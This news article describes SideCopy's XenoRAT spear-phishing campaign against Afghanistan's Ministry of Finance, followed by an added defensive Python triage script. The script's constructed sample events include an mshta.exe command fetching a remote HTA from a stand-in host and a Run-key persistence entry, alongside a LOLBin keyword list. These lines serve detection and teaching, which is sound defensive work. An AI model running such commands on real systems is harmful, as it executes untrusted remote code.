SideCopy Hackers Target Afghan Finance Ministry with XenoRAT

A Pakistan-linked threat group known as SideCopy has launched a focused cyberattack against Afghanistan’s Ministry of Finance, deploying a persistent remote access tool called XenoRAT. The campaign, dubbed Operation XENOFISCAL, targeted provincial finance officials across all 34 Afghan Mustoufiats—regional revenue and finance directorates that form the fiscal backbone of the country.

The attack began with a spear-phishing email carrying a ZIP archive. Inside was a malicious shortcut file disguised with a PDF icon and a filename written in Pashto—the dominant language used by Afghan government workers. The lure posed as a list of employees invited to a seminar on psychological and intellectual warfare, indicating the attackers had precise knowledge of their targets’ working environment.

Analysts from Seqrite, in a report shared with Cyber Security News, identified this campaign and attributed it to the SideCopy APT cluster with medium-to-high confidence. SideCopy operates under the broader Transparent Tribe (APT36) umbrella, a group with a documented history of targeting South Asian government institutions. Seqrite Labs has been tracking this threat cluster for years as part of its global spear-phishing monitoring program.

Once the victim opened the shortcut file, it silently launched mshta.exe, a legitimate Windows utility, to reach out to a compromised Afghan education domain and fetch a remote payload. This technique, known as Living-off-the-Land, abuses built-in, signed system tools so that the activity looks like normal operating-system behaviour rather than an unknown binary. The malware then decoded obfuscated JavaScript in memory and wrote a persistence entry to the Windows Registry, naming that entry so it would pass for Microsoft Edge on casual inspection.

The final stage deployed XenoRAT 1.8.7, an open-source Remote Access Trojan available on GitHub, which established an encrypted connection to a server on bulletproof hosting in Frankfurt, Germany. This command-and-control infrastructure was entirely separate from the delivery domain, a deliberate split that preserves long-term access even if the delivery layer is discovered and taken down.

The malware chain ran across five stages, each built to pass control to the next without triggering detection. After the shortcut file launched mshta.exe, it pulled an HTML Application payload from abimj.edu.af, a compromised Afghan education website. That payload contained obfuscated JavaScript which decoded itself in memory and dropped a .NET-based loader DLL to continue the infection.

That loader DLL downloaded an encoded, GZIP-compressed blob from attacker-controlled URLs and unpacked it entirely in memory. The shellcode that followed used reflective loading: it allocated executable memory and mapped the next stage into it itself rather than going through the Windows loader, so the main payload was never written to disk. This fileless approach defeats conventional file-based antivirus scanning; the payload still exists in the process's memory, which is where memory scanning and endpoint detection tooling have to look for it.

XenoRAT is a capable surveillance tool once active. It connects to a hard-coded IP address using encrypted TCP traffic, allowing attackers to monitor and control the infected system remotely. The malware can capture screenshots, log keystrokes, and exfiltrate sensitive documents, posing a significant threat to the confidentiality and integrity of government operations.
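The behaviours described in the chain above (mshta.exe fetching a remote HTA after a shortcut is opened, a Run-key persistence value posing as Microsoft Edge, and a non-browser process connecting straight to a hard-coded public IP for command and control) are each detectable from ordinary endpoint telemetry. The following triage script is an added example and is not code from the Seqrite report or from Cyber Security News. It runs over constructed Sysmon-style events; the hostname ws01, the compromised.example URL, the file paths, the registry value names and the 203.0.113.10 address are all assumptions invented for illustration, not indicators from the campaign.

```python
"""Triage heuristics for the delivery, persistence and C2 stages described
in this article, run over constructed Sysmon-style events.

Added example, not code from the Seqrite report or Cyber Security News.
Every event below (host ws01, the compromised.example URL, the file paths,
the registry value names, the 203.0.113.10 address) is constructed; only the
behaviours being matched come from the article.
"""
import ipaddress
import re

RUN_KEYS = (r"\microsoft\windows\currentversion\run",)   # also matches RunOnce
EDGE_BINARIES = (
    r"c:\program files\microsoft\edge\application\msedge.exe",
    r"c:\program files (x86)\microsoft\edge\application\msedge.exe",
)
LOLBIN_HOSTS = ("mshta", "wscript", "cscript", "powershell", "rundll32", "regsvr32")
BROWSERS = ("msedge.exe", "chrome.exe", "firefox.exe")
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# RFC 1918, loopback and link-local only; documentation ranges such as
# 203.0.113.0/24 are deliberately not excluded so the sample below fires.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
                  "127.0.0.0/8", "169.254.0.0/16")]


def check_process(ev):
    """Sysmon Event ID 1 (process create): mshta.exe pulling a remote HTA."""
    hits = []
    if ev["image"].lower().endswith(r"\mshta.exe"):
        if URL_RE.search(ev["cmdline"]):
            hits.append("mshta_remote_hta")
        if ev["parent"].lower().endswith(r"\explorer.exe"):
            hits.append("mshta_from_shell")   # consistent with a double-clicked LNK
    return hits


def check_registry(ev):
    """Sysmon Event ID 13 (value set): Run-key entry naming itself after Edge
    but not pointing at the Edge binary, or invoking a script host."""
    hits = []
    if not any(k in ev["key"].lower() for k in RUN_KEYS):
        return hits
    name, data = ev["value_name"].lower(), ev["data"].lower()
    if any(h in data for h in LOLBIN_HOSTS):
        hits.append("run_key_lolbin")
    if "edge" in name and not any(p in data for p in EDGE_BINARIES):
        hits.append("run_key_edge_masquerade")
    return hits


def check_network(ev):
    """Sysmon Event ID 3 (network connect): non-browser process connecting
    directly to a public IP with no resolved hostname, as a RAT with a
    hard-coded C2 address does."""
    hits = []
    image = ev["image"].lower().rsplit("\\", 1)[-1]
    ip = ipaddress.ip_address(ev["dst_ip"])
    internal = any(ip in net for net in INTERNAL_NETS)
    if not internal and not ev.get("dst_host") and image not in BROWSERS:
        hits.append("direct_ip_c2_candidate")
    return hits


CHECKS = {1: check_process, 13: check_registry, 3: check_network}


def triage(events):
    """Return (host, rule) pairs for every rule an event trips."""
    findings = []
    for ev in events:
        for hit in CHECKS.get(ev["id"], lambda e: [])(ev):
            findings.append((ev["host"], hit))
    return findings


# Constructed events. The genuine Edge auto-launch entry and the browser
# connection with a resolved hostname are the benign controls and must not fire.
SAMPLE_EVENTS = [
    {"id": 1, "host": "ws01", "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Windows\System32\mshta.exe" http://compromised.example/notice.hta'},
    {"id": 13, "host": "ws01",
     "key": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run",
     "value_name": "MicrosoftEdgeUpdate",
     "data": r'mshta.exe "C:\Users\Public\edge.hta"'},
    {"id": 13, "host": "ws01",
     "key": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run",
     "value_name": "MicrosoftEdgeAutoLaunch_1A2B",
     "data": r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window'},
    {"id": 3, "host": "ws01", "image": r"C:\Users\Public\Libraries\update.exe",
     "dst_ip": "203.0.113.10", "dst_host": ""},
    {"id": 3, "host": "ws01",
     "image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "dst_ip": "203.0.113.20", "dst_host": "www.example.com"},
]

if __name__ == "__main__":
    for host, rule in triage(SAMPLE_EVENTS):
        print(host, rule)
```

Each rule is deliberately narrow so that it can be tuned per environment: the Edge masquerade check keys on the value name rather than the data because that is what an analyst glancing at autoruns would be fooled by, and the network check only fires when no hostname was resolved, since a hard-coded C2 address skips DNS entirely while most legitimate software does not.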

This campaign underscores the persistent threat posed by state-sponsored actors like SideCopy, who continue to refine their tactics to infiltrate critical government infrastructures. Organizations must remain vigilant, employing robust cybersecurity measures and continuous monitoring to detect and mitigate such sophisticated attacks.

Source: Cyber Security News